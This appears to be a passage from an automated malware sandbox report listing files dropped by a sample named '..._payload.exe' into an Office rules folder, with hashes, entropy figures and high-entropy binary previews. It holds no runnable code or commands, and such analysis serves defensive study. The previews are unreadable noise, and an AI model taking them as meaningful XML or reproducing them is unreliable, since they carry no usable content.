                                                                                                      Preview:<?xmlk../.K7.!...fO".......\.L..(.k..@/..8...L}6.H..:)........2.b[......^Ty.o..+y.&......J...D..../&.:*..1.c..w.e..y ......]G./9.b.H......:'.G....u.....g...z.W.Y.%`X../E.88..=.A)<'.(...2....>..(?..@.&R...My.,V.}....J.TC.L....?w.C.I.+Y.^u..#k.6q...p....../..Ft.A....a..l....Au[...pRg...m.`U.$.JI.....o8.Y.>.N.QA.:..^.M..c#|&.%.>[B.(.)A..(k.:+..r.}.....Yv..r...u.B=yzP_..w.C|3iAib_=_.M.R...l.s.TbS..}#.{M.\...0:..%"k..9G\M.X..<..`...1..2..7.....%8..%..^......Q.~0n.t.....]:0.....5^..a..Z.{_._.6....#;..5..J._.Ng..&p.....MW........,.4..=.z.9-}e.x.....j....`.a<.]...Z.#...".].f..lro.....=r....y..Q......G%...._4..k.d...u]V..(./...?.;.JU..w|o..'hy3..q..%'.v......X.qta_..)..?B.._.....N.%q).mg.E.r.y.4`.=>^.......&^._....Q.....~.D.}......6....t...V!....r...!.......Q.+...M0W..k.C".&ksM.$*./p..9...b=|...q...u.n#.p.f....\N.....pDM...u...E.I..T\.......`..#.....&.eNDZ.......zv!+..D6>.....J}.F.]Mq.....Q..{.......JP^.........!..G..3.X...._._.p.g....iUl+..X..S.....c{.q...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703500v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1695
                                                                                                      Entropy (8bit):7.876538162778907
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:tLcIq5ZCItZw9wHzPBZavkpbWnoi1Qduw290ZMwD:tWZCItOwDBZavmpuLsV
                                                                                                      MD5:344CE03DBF4DB594EBF5D02A524CF5EF
                                                                                                      SHA1:76A897486C22E2FB1AF000708C6C85B377F41004
                                                                                                      SHA-256:29975CD7FE2C004C7F38DDBC0AFE9A7C7796E277C81093CFC063916EC68CAB5D
                                                                                                      SHA-512:3E4DFEF1D297C358396430F3FE58ADAFF18AD3B631093E1D5ECF1D810EEA5D15A4582452F82AC0E3BDAD3FFEA84581A6A0E237B602D0FCEC3B44FC4C051D115C
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.b.73..mN_...-nR._.d......E...H?..e.J.2......'.@j....%..8........ ...sx.YC.(eX.8(.'..`:>{...B..."@.&G;..^}..R...}.....2..|.I.R.>.b.[...I./.0.r....;.....M..m..u...B......f...Y.ia<d..A.......[y.N@G,......[..K.......=/.9g...{.....r...........,5....].4.k...s....ZhdZ|.w. k....1-....aq..{.....0L..V*!....mF.y..........B...w8...r..9....}................0q..^.U.w.z..............#.}!....J;.SK..H..Z..>.H.......u|.DI<K.......x.....?.B......+..)m..:....%.b...U.I.YX.@...vwC.d."j..f..q..hk....m...^Y.......z...."B.j.L.g.c.k.....g..F!..9..j.......P..w{.4W...Y".<h.Z....M5.I3iB..c.AiA(.i.a..A.q..s;.W...QD..3J..'45.r...Z.<..zD......u@..\......."..K.....?.S!...H.<.1K...m.....)m."T............n...Q.P=#!...V...`.......ueGF>y.A.....:...E0...2`.W[..m..&.M......l4>..2..N&...o.....)..i......v5......Q...P.0nC......\j.C.)}ujw1.1R.dsP`l).NG..M.7AT_.c..A...*1......W..h(..k...&...!... #c.`.:....w..;@N-.U...q..%..z|3..G.8.g-Yg..t.e}...86.Dt...w..C.dT.....g.Hdyo

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703501v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1732
                                                                                                      Entropy (8bit):7.885096229846472
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:AY5Dq6zUtBxHxdr8gXhhizR5hOZh/L9Ej03D61wD:j5Dq6aBHXPizJ0hDmwDT
                                                                                                      MD5:A7F5240885DB826471835283EC6AE356
                                                                                                      SHA1:612B3D7505ADEA523148A5E228763DB759D675A9
                                                                                                      SHA-256:4B92B9E721BF0700550C20D1EA7BA51042F4EBCCE87F5B79D15C7A1ABD717C5D
                                                                                                      SHA-512:D9E1BB29D2B0668BA5A3D9F24B25552F51497327EC7DF89D61F386C7DED5B86EC1D058664EAFFA9A3C3C38AFB75888ADE26822CB2BCCB714125B03228CFB283D
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml=$.,.h.....b....P...=.j............:....Lj.....hx..;;.`..uW..@.B..z."o#....e;.l......c...h$,........Wm@.M|..[.|blR..P....Z.56..!&d...]]...........u...._.9...$....FXQ.Q.2..JV.......K..i.6...(a.....Q..Y./.....\.....6.\.u.......{........qV..........pN........Z.....9........C...^.l$....@.H:(..Psa.u...r%.O........UEO....y.U..Fy.<(..}#U...>.;.5.....=...4.x'.z@..%...J3Hu....-.TI......8.<fJ.xJ..Iv..3..n.......,.F.gf.'.]=ip...T.\..?..A....6.K..Z..hjmC..8e..TAZu.B@PD.N..cp.=.;....:).r...}.+......-....!W..V.h].v...-Ax.+..p.}....... .e.$di..f.h...*..J...S...wyFM)..G...j~.h...T\.^?.U.b'...n...T'..........u(..Up....O[.~._[..3....4.......B.p.F..O!.W,\HIM...N$........b..Ie......../...=.r`...ZXV. i\..3..N.gr......p..t....{x.g-.....,...B.j.].....i@.S.E.T.......V..x.[.....X.>.k@]u.B&......G.#.D.*t../.^YE........ZOgy..}.y...O.%J..ZE...y...T...v..d.P.b.\3..ku.O}..x..9w..y...c...u4..a|B.f\.@%&hp@....715...,{..C,L.../.W6$0|.t..Q......)....!d.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703550v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1705
                                                                                                      Entropy (8bit):7.883033965170198
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:w3ZCWJG/Gz1zy8SdUgGgHLth27yFbAk7uXzElM7iTMFQlgk/MK6vSVdd7sv6bD:wJCr/GzZy80XLX+yFsMUzQFlRVTwwD
                                                                                                      MD5:E71B44D28CE448EBAC419FF51CFBB7F5
                                                                                                      SHA1:61AC3886C29A7A105E6DC79F851F3171D3BB368F
                                                                                                      SHA-256:926F970B0D6C924BB168C701DEA434BADB780B8F8EB7E5F64F36512D39234CA0
                                                                                                      SHA-512:08C8B7C41B9C1990630E39F47DA700CCEA2D6C3D78EC427B262B4A4D1BCDB34D6F5749E9950D931AD69D497C70086B66582C298B96304A346FD7C99A83476199
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..._.$....4.3c/......u...z.x..Z. ...c.o..&-......?=....U...N.X...p....^......W.E....TUfy......=....!7)x.!.b..L(j.D@....}h.../...7..?.&,.!....[.|c_.7D*x....*h>.D.Ee..<.g..........A...;..P.h.s.<.R...j};Gx..9.cG......cA..W)..S..,-.'j...E{..lN.w.<.....f-....cDX".-~.......z@...s.Ja.e...>.....[..B.`.Z>..0.H>~.7.....K*....N..Nio6x..!..6.s...L.K.....q.......L.%..S.:9.=%A..U.q.tJ....u.ip......>..3..Wo..A..f..O.e....z...b.&.~........=...3K..[zM.....q.&o.y..W..lS......lJ.V=.?[?....p....b.{..ng...m.7y...y.}..^.g.oX.N...t...V......b...A..P.#.DT.O.#[u..P....H.a"\...)..6f.W%$...h..&...Z.....E.x..W...h......'....Q).n..+G....*...[.(&.Q.cd.33..'^ fS.s......P...Q...._..A.?...t.WY...(^.p.$;....7k.......z.=h@..2.....o.mWo.'8. [L..B.T.#}..]j..Nz.Y2&.K.Y..S..k..q...1C*......a.Q.;xI.Vm..vy..E.=.}S=..|7.....#.ugV..Rl.V^.W...d[..v..zv.3%...cp....R.I.,!:..As.^TZ.....#..1.-.T..To..>v..U.|.g`.!e...,.uHk.v`....sD.z....7..}.$._.>..VI2.i..8.*r.1.9z...;.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703551v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1742
                                                                                                      Entropy (8bit):7.894890358376713
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:rJNRDNWELbky5XkaxEU5ibDUC9kBeWXmv4m46CV5wD:rJNFx/aQEN0CustvaVq
                                                                                                      MD5:351648A3B3C5DD23E33E0896E6C25CD3
                                                                                                      SHA1:E783952EBB212B9373B0407A0A088EA323767675
                                                                                                      SHA-256:CB9DB193BF682B32E725BF5BDEC6CF2EDCA8CC05325DD91A2C6954278BE2E5CE
                                                                                                      SHA-512:02636D7424C948DDAA2BA70854D052068EAE560536184A8EBDE06EEB1AD86BB32E165E2B536469C836EC35DB81FB5F13EA2CE56CDD67BBC6460A96BC2DF056F5
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..c..$.D.hJ..j..5........]i.{.....c.&.[....OI.j.ga.#.5<........D.......J...Cg......U.t.4.h E....FH.>.%:hJ......8.* ..@...!..&.!EI..j.....x.GJ..uI......:A...M.*...#R1z.MO....BDJ}...H.dC..D6...D..R;z.ejZ..G..UHF..E)x....@.e.."..;..6.../.....-....W..O&.O........Y6..3.[N.U......v..]!........F,g..L.W...K[.W..B.A..`...M.N..?..&a@@...l..#.?q...}........8].x8..%..!.F=:..m.r*.....K..8m@.r..~1..o..:U.c.f.h.%...D...*t.z..@.+zX"....foB..{.......e..i.TA.._...?T[.*.^....1.....#..J.....hCD......\>...vG..Y...^.~?p...d!q..O.#.:..-...G.(...Oe...i..1...z.B.6f..S"...c.8"P'......i[W. ;.n.W|...AB.9....[.E..{.v..9..oSD.|.>....n..;...D...26.,..w..pS..'..J.......{bI.......8.gR:.E.....7..,.@^...e..cc.|..N.1.g..]a.p.....Y4......D..G(.+@..h......(..ij.....n..|k...AxBnC....B...T.cg#....%."Z..]x..N)9.!p..A..>.(.o"....!...u..2.....).../.W...mq..)...[...[..W4..r0...4o!O.<|......I......3%....T..z_...c..o.<<.%.\1= ..nEM..~.=............||...l.V..KpA......ee..........Uo.&.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703600v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1691
                                                                                                      Entropy (8bit):7.866737997270343
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:GzGdZPf+z3p/HnmSomF0bA5Uf3fc6foAMRwwD:AGv+T9HmSD0bAAfc6fo3Rp
                                                                                                      MD5:692957D5074409DC4C36FA96DFDC723C
                                                                                                      SHA1:67AA69CCC027235F78C700F1112B6DD71AABBF81
                                                                                                      SHA-256:AF61F7AFE9273B8F1A6CB492011F501B692EDAAC11706366B9521915EB36BF09
                                                                                                      SHA-512:9F1136C807F3060B0200C735273D073D1E648D9A27334CA8391DF8E45A420A7A85BEDF2B9EA7FB8FBDAF97B4FD05065FBDFF18D5E256C6757CE8BC1B70E73B0D
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlc..>....m.$....z..Z.n.Xc7.h.._...".....~..;..B....Z."...Jk...R.....1\>.9.T.D.Q...V.H.....R.Y.!.H1.pQ..*..a)d..].............C.9.".......K.. qH.:..O^...t.0q....{X?fxf......`.#f6...5..x.Q.....s.`duQf...'...R......M.JU....-......|kU.6...e.:...R.=5..r-X.c.o...a[.a..8...O..(.$....Kn.-.....8..E.S.....v...fr..fe.Q/3a=d.b2...v<,..J..".|.5TR.i..=..&.....k.%?.K.........z.j.(....N#..Ps...H..;...S..>.\.(6t.z0[../..]..T....ObL._8....y|..:...RV.NW.s.gY.).)C.{.s..Z..DS.7rp.)...Mc[.b....3.$.&..e..k.H_u.).....k..%0........"..... ...|7..W......>..."..Y....Wq.H...M....[_.q.{fioJ...<q.q......hs."..../X..vr#.wHD....r.2V.z.dj.7`...).R1.[..?F....$#J#.`...D........_..`.ksq).O. .........Y..4...*..J..g.v?Tg.U..."...l.Zs..\&.........9......aM......y.u..1...67@..WE......0.....L..........E]..Ds.|..a....."#..e+.t..Q......n..M.YF.=......e..TP........7.L).1.....k.LW3MZs.D.....@..i..V.V.&...m......%..j.4...#..l2..-B.W.[T5.......e.....<^3.3U/g..(,.....s..QR..K#

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703601v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1728
                                                                                                      Entropy (8bit):7.884362095375468
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:ZpZ2qyGZ+ENAiKT0D8WmNPFArjccrWXUO/AIkRnwD:ZLL7Z+ENnKT9WmNPy5WF/A6
                                                                                                      MD5:305717E37D8A0EC6B6E46F97C69ECF05
                                                                                                      SHA1:7D02D29517717E8A35ECADB962EC6CFE53593186
                                                                                                      SHA-256:8443DEF7AF2E36935CE797D9147EFF4CC6BC64A7B2ECC5F885F064E71A44CCD5
                                                                                                      SHA-512:F602384380B5E1912A8B30C0B8DB3D2232130B9C283810B40E18D4D3EA335A3243EB6BB9701F7390C9B452C65627A33208600AE1CC3132984326797BB12B54BA
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlb...$6...Bj.._.3BC....Y.r4..e=..u......5..%.UnLr...q.6..EX...<]....J....r.-...ng...8..d,.....m...8$.*-....'8...CT.k?..<..0...@..7='.. Z...;._....hb.#HYE..=|b..K8.~...J.TP...a..{.Z..[U.Z-FgfZ.....4`jE...)..\.v...v....J..?.G.....9.i.v.F....P..s.....8...yY{.c"..).....I.bx)CJ.(l.V...4).....p..:..B.....K.1......1[..MpP...a.y.g.....cMEA.S.t...t..1..q.....,.r....@..Yv..#.=n.7..9.'.n....<.J..K..!.&..J....12.../.c.....j.'x~.R..q....CA.......~D.,.?G9.....>....0...<...x....t.q_.f..S.....E..y`......*.k.h..m.[..0.'PK..`......Ay....q,.1.......cTp..O..j.........*@1.....".0.*.~....W...re..(...s...Dc...+=..!y..c...."....V....;AB..\.Z.9....<.Y..J.xp...b@.@Q..[..9..#..&X.<x....c~.]..e.K]...M...~z..6.......-@p?.Z^..y!.7..m...tp...Ke.@..wM..$.+.z.%X]8n...L...H.j..$n......,9..,b.[.d..@..?%...hL...nQ$............v..s.z.X......q...|....CT....U...#.bf.....kp..#'..;....FL}.WEc..V...A+.~...V.rm.Hi...s|........I.h.,Q...&.Bv.$P....+...,...,pv.h.QWE...].NG......f..~.&..#_Jc?.v.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703650v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1693
                                                                                                      Entropy (8bit):7.885329037286095
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:xMdKx8KySvqVZ625BpJrIrpo8kQsZrxVLyX5OeipjamBRT8tDtq3B5PP6tmfv6bD:qdKyCy6yX9OG8H4zqIBamTT02zPMmfwD
                                                                                                      MD5:E9369C196D514A3A7A9AAACE4E4851C6
                                                                                                      SHA1:83F0192A029BF1A20A8F8D60625A93D257F399E2
                                                                                                      SHA-256:229D7F38D9722AC262CDAFCF16153231F33CCEE00E3CA2FEF1087A3359D5AA20
                                                                                                      SHA-512:2759575757E6353BBAF387D8BC68EF79638F15B8D6ACD49950142FDA4A8FFDDC35FC417E9DF4F76A507C55AB40EC1CB21EE776AD859371C5F7FD32B6D4311EF8
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.:..pC..o7K5r..'...#..Lg.5&..G... ..\Uu>..V....-.>s..i..3....EgT....2oM{.....+k.._.C}9.q.s...P..<...h.<....../.A..p@m.T..N......!....GX...Y.;.0?"6l.N82"yH......*..G...P...n9g......b8x*D..;!.V....T+.....C....?..[.../...*.y..m........w<+./...c.+..$.....3?z...O.u,.3s~..t.np.I...]9....d.}"j..8...v3.4....?;DKF.... ..co........b^..5cO....f.H..Q...k...._....B<..'....,.D.<...C..t.*L...9.....-u.H(.w.u.o.....'...!.... .p.^A]...zD.b.JRe.rO..z.x....5A.u..S..p=g..$..........=..5..N.[.;...m7.q..pf.5...$\.`.....v?{._.k.?.@........[..4.S..+7.+...^..r.q......|....0..h.OZ..!p..*"..xy.n.2.v.+j".dp*.s....Va....r..@&h.lKM7s..Ro.8._..#.wkf{..%..RB.\.m..5...g,2..a......|.... ..\.....D.<.......f.X.ta.[....._.."r.S.B....r.IqX\.O.CC.xr.Ch..:...S...@.|...wU.C._5S{..jBN..u.>.`.Q...Xt...,.r....H..>=."......O.p.......bi,...@jq.....j...<].g..a..Iq .z..F(.Y.(uf'.7<B%...U......J..y.i....U.Mm.ur....~@..".Iw5En}...\O..o.......C..a......S#...t.e.e.;.<fsG.J...d^A....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703651v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1730
                                                                                                      Entropy (8bit):7.8861954522895
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:hlMrVHO4vUUoYwvz/SbC72Al/nV77nCI22RQ7WD+NGOwD:PyHOSUUoYwvrPnVqIk7JNGD
                                                                                                      MD5:366189D5EB93359939B082896424943B
                                                                                                      SHA1:A848ABAC18B4200D288ECDDCF6ED93347E2D6652
                                                                                                      SHA-256:C9950D8E38DC55AC51CA9DA3C1A3E489BB02D37CB1DF0B5EAD54955C986B41A0
                                                                                                      SHA-512:159FEE5707826BDAF95F83575F814E3E7CF5658992C39FDD7EBD31C1BA734F5ECF427E24D10DCE4973A4AF57079CEEAB83E495D4AC5D646CF005A5D1C20144CE
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...@.T<...^...:Xp.4....1_.^"e4......*.!e.h.^?c.&.T.....Q....b.6.e0.....M*..Fl!p...h-.G.:./.....1..>4.N...XL..lx.`..~..[....Sc3...?...a.D>.....I.....xkF...[.{..O.w..".-...7.B..;.-.....@......_C..u.#@...{19......;7.&.6....[.T.1...!.H.L#.`a.H.......~...G..Od.=;|(\..;p.......DQ...44n.V...k].(g.j.....y.....2..PjS..p.Y)+...1........5...H_..Y.K.m..P.?./..}.......8..YI-..e......-.efA.....KnJ'.Ys..$.U....W..."mz.e.[..._..r.:.6s..zk1.yu#:E.$9...Q;.. ^.>.r.....%.|#0...b.jBm=.t.....\..P.a.j.{}..j$r..Q...|.4......I...s.0Lr.....?nO...RCX..wn.\....D|b.a....[.U...7...5'0..J3........7sr.%H.<t....<...w....E.....r...@...7.s....T..8B.mD+a.8.A.C.....XG.$a3...D.Dxd...`.I'.K.uu.<....."..3c..<.....\...zMM.Fso4UO29.o.:I....4,p..2^9..b.(.)..l.._....<...a...7?.ZV.Z..>..Os.B:.>8...yz.. +....a...C|...`..<~o..&l....O..:.#6.5....<....BMo..._UY.jMX*.... ...N#.z.o.... .4v20.KH.~...,..c K.....zK.<._?..|..E..f..+....O.)'H[.f+...>..H.[^..~:.TPX...:.]x.V...P.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703700v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1711
                                                                                                      Entropy (8bit):7.877932587423647
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:CPaFoAOhvg80hIWMNFA6zjKpbr/P4IhDCvZzL81FB+Q1wD:cEoAMzCIWWwr/gIhDCvZzwPB7W
                                                                                                      MD5:B9E8476D444A0112B08E94A3CD33B2DC
                                                                                                      SHA1:3762B01B63FA62E808F5EBFBF5C630D7C36083E9
                                                                                                      SHA-256:F03398192074F271B9832777B743700856370323CB138EDF6AC164870FAE778B
                                                                                                      SHA-512:6351C3ED7046ACEEA11E3BCB5428ED548727F06EB5CB017B7801109A14DD4001EA4235A00A95FB0B4B5EAA4BAB3957C38000F15F300AE00B59313CDCFAB3A5BA
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.5c.uO+..e.t`.CVt7mM.Mf...n)V..{...u..Z..........Y.iE p5.Qm...Fz..l........"rS.....d...S.V..s.T~l....g3..s....(.% .Qk...<.C...'..&.E..a...o..B...1....M....[....~.!.....$.&Z#.,,...E.Ag....g..8.._"..&v..?.Z....M(.`1'b../*.g6i..d0.....-..m.....1Rd.BY.....Z.8E..=k1..H%...E*..{..dR.8...G...........$sFw.@..OEU;&.4..E.3#...:a.."2..Y.t.T,.-c.1......E..(..P.tx<......[ES......8RkF..~.dUb.V.}....%...t.{-Z.r.. .lg.m.)...7...S.h.<....G..._:zRk^...W.dr4 -w.+z."/...t......q.#i..k...OJ....2............0...1.$.!t.F.....ot.......HDU.....#.a.t.\....=DmJ&%...q._.....c..o.....p.;e.v..........Smk..R...j2......=b.....h.. ....v%.8.[}..........Hbh..[...e...........K..P"..j.*. j>W1.7aKT~.....oI..-.j......~p...+.]>...i..>..M%(.V.t.m..IG....34....v.1.....zx.....s..C..y..i.....K.'.R.........,.....at.~..9MiQk..Q..9..C......#......Ej.7.%....8..R..X...Id..#......~.]I}....m..K|.W.8M.G..f...!...'-y...._I.....0.k.!..Z?k\.0...X.p..........K.9.NXg.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703701v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1748
                                                                                                      Entropy (8bit):7.880037479245412
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:z+SMjs5yTfv0WzKNFlfVulTLJKdBor8ELROZULiWdJRozwD:z+JsBWzKNHVqTlABoQELoqmMoY
                                                                                                      MD5:E8A776B6B65F48CE65C25260E6C5B3E7
                                                                                                      SHA1:E9CF8FAD812FB90599532657F434845FE5DCD921
                                                                                                      SHA-256:3296343FCFADFC434C0B5037AA73F9587029771BE134156277A4FDC9AA5CBA41
                                                                                                      SHA-512:8247D3BBF43482341A951CEB15977ACBF623FC79E81C5F1CBDCCD6BD93BCFE6DA18C8AAAF1FC3BAB30E666821173585D542F10AC6806C963C156E2B09E9AB0DB
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml s..*1...@sF.J4!?a..%.....jg..a..3I.....,..&.t.p..2.".....D.R........J...r~ut..]...L..M.f..vQN%....Yp..D....8ao.P]g9...]..B..^.P.M...lc.O..W]C..`......@...%6..J?4....'.m.M]t[l.b.Y...wk....`.P.....3oH...6..I...}.2j'.O!$....3..x.c..d..........1s\.7`'..8.=.d'[.2.(4...x.i..WH.U.@.'K......w.(R..C...|D...6.'kv...._'.....E...N...;.rky..$......5......).w).o..m.*.i.P..Gg.....4f..[)..\..%......Q..vD...Z...0m......,.V.o.Ji.X..O..+....-X.M.v&....._.'.\..j......8...>V.....G..8..h..(2..">....:j.~.....xD..Ee.......F...!Xm5..i..T.&...8.......I....u2.{H...\dM'.q.......&.)X..4..;.3.w......C.~.+.'jj.G.`...65...l.B..v(j.a.-.W......ie.>.......3.MGf..9..F.4!...c....9...q>.5..0g...wTg.9().LK.A:.T/]...|..}k...l.(..C.M..'`b.`C.......r.X..Jo#......$...Ep.....z....~...G.....G.%K`}.R.........1.X+..r.q........dceb6*Z.B.0...81.!u..B.C..Oa.+.`....n....uu....qx~..e+F..1J.)`.S....s....!oc.'U.!G......F..........-......S.t0.1E......!...&..<@M.4.x.R...4!.@r"..~. a.......iC.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703750v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1733
                                                                                                      Entropy (8bit):7.909979716558757
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:brgBNspPGuY0AwNA+lF7+RUCzQcZp+fl9SIeI2KX1PUwD:b0BNEPNPlpt4Zpi+XI/Pt
                                                                                                      MD5:2DEC15ECC0091FA52D7B3BDAE89ED965
                                                                                                      SHA1:AC2E04BE78275AD4DE94C585065278A5371B1CA7
                                                                                                      SHA-256:1C8BC58208A429BAC800AC57940E6D3A9F609BD8C15B461D156F1D87101967C4
                                                                                                      SHA-512:45D10511EBFA379C961E98519C1007428EA0F88DF4B4ABADA9A7F622C98770680C0256C0289C451872319450D542AFA480AE6C93E34DC12AFC01509FA40CBE29
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.\..]........|h(.)..+,.~K....k.....^...gw.rj.f..J~.6@J.O.J......@.r.u..Lz......8..s...ss}......v.t.Y..l.gX./R,P.Hh[@.....J......U.....T..'#(.8...>..e.~eQ.s#.~....".....Q...f..d......L.+...-."..NV..}...[.|.....J. ...%r....R{..*.@L..a.G...(8.QVd5q.d.Ei..l..%...!2`.......r...;..3..Y;f.<.....\649%8.....7.a...o....$.CPh{.........K.....(..7...mpqk:.=.qc..!.%..:..@..7 4..=hz...R.Z+.?(.7X...'C.:..0...&a.r.q4......'O..).|.|...Jg...;....].zOw.......w.Zh..U.F.....X)y.zDJ..o.\A......w.L.7#SH.4K..*..:.P..#^l..,.J*. ([.D... .@.._d1t..[g..4...<Ft..Y....^Ok....XW.|.....9TI{.(.M."/..,..\;.N....H...[p._.R+....y......q..>5..=,.....G.h...a"h.k...{.....y.../...f[....j.....].h.F...tD....E".]^.d..U.do..{....>w_`....5H<.+....{6K..IzrU3.sh.....r........<a.8.d.*h..6K.3*4m3...W,KS..-N.8.5#...q..[....*..|..j[6\.{c...=.A.`q....8.....n l.UN......v.+S...Nx..}....8pZ..8.g........&.....jtW.&|D.)O.0%...4.t..N.s.]).!.y..,:;t...b...-K-B.{@...3.Y;....8..7.es.#..M........

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703751v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1770
                                                                                                      Entropy (8bit):7.887450228364552
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2YeUZuXizwnVZK1vuCryGKDRhYeuE6Zu9mEDqzeuEy3YDvclphSx0GmgR/QMfOzs:qflnJTGUhYVFzb+Uu05oY/zwD
                                                                                                      MD5:3C59D4E5AC89FF0188512D8298D069AF
                                                                                                      SHA1:17A3D01A42C670A77971ACB644006C216F0F9627
                                                                                                      SHA-256:7BC596822B6AE3C480ED7E181B6C37F059791518EF824DA32AE0BBDC167A4BEC
                                                                                                      SHA-512:AF5356269A80C762AF5A8E2498B04536259F93EC69538AF9335E47AAE6CA66B31B2D9BCA0DAF40B8CD44EC8C9F9D47EF46C3ED8A5D1463DBBA0574F0A8A81C67
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...>.....}:@.#..c"g..5.p)r............\.O.....@z..Dnp..;H.B.......:......B...P....r.`..1..F......\.....1.R3.2.\...~U}P.\".dF..q.........}..X...6[lP..F..,..).@.T.r.....h......a..F.j3......;..I...:..4.L..ES..".{q.Z.y....)...VD..9.J.cF3.s.z.......f..4vd......w.0.l{K.=$.4._Y/....D..B..C.cQ....X........m.l^m`..n.+..P.@A,...F...r.W..j..=.,.fB......o$..R..iS....lR*....u..F.....Z......`...\...yX...Tzk.........~+3i@...........e*..Rn<w....z...Q.....t.....u...E.......=....F..s..z........WK2.:....X..t.@......W.2.....E...L....iV.pP&.PQ.>.L..P..K....l..._f..:9...P..R/`....l!K.e.....c..H.....+.X..a...M.|..z_.0v......N.......^.^.S..ag....$.C....Tq.<m.'...@D.....^T..cn.}..i)c....O.......4..D..L3.8Q.J0Pd....mN.v..Bt..=LT.f..r[Zo.].0...^......,.I5.U<.i..C.,P.........+..v8.Q.v.p..E......L..sb*.ar Rez....5HC.B..]v....(..G].....)l.1........BHl.\.JrU.`..<..Y.\.$L&V.p. .].T..4..:4i.P....mPc7...g..>...1Q.L.....Uj.].7.c....~#.8..5.k.O;.V.7.h.o.N.vY\.
